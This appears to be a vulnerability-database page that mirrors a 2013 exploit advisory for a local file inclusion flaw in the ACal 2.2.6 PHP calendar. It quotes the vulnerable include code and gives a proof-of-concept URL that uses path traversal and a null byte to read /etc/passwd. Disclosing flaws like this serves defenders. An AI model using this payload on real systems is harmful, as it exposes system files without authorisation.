Lucene search
K

ACal 2.2.6 Local File Inclusion

🗓️ 15 Aug 2013 00:00:00Reported by ICheer_No0MType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

ACal 2.2.6 Local File Inclusion Vulnerability, Exploit by ICheer_No0

Code
`Exploit Title: ACal 2.2.6 Local File Inclusion Vulneberality  
Google Dork: -  
Date: 15/08/2013  
Exploit Author: ICheer_No0M - http://icheernoom.blogspot.com/  
Vendor Homepage: http://acalproj.sourceforge.net/  
Software Link: http://prdownloads.sourceforge.net/acalproj/ACal-2.2.6.tar.gz?download  
Version: 2.2.6  
Tested on: Windows 7 + PHP 5.2.6  
  
  
---> Vuln Code : /embled/example/example.php  
  
12. $path = "../../";  
...  
25. if (!isset($_GET['view'])) {  
26. include $path . 'embed/' . $view . '.php'; // <-- LFI + Nullbyte (if register_global = On)  
27. }  
28. else {  
29. include $path . 'embed/' . $_GET['view'] . '.php'; // <-- LFI + Nullbyte  
30. }  
  
---> Exploit/Proof of Concept (PoC)  
  
http://localhost/calendar/embed/example/example.php?view=../../etc/passwd%00  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation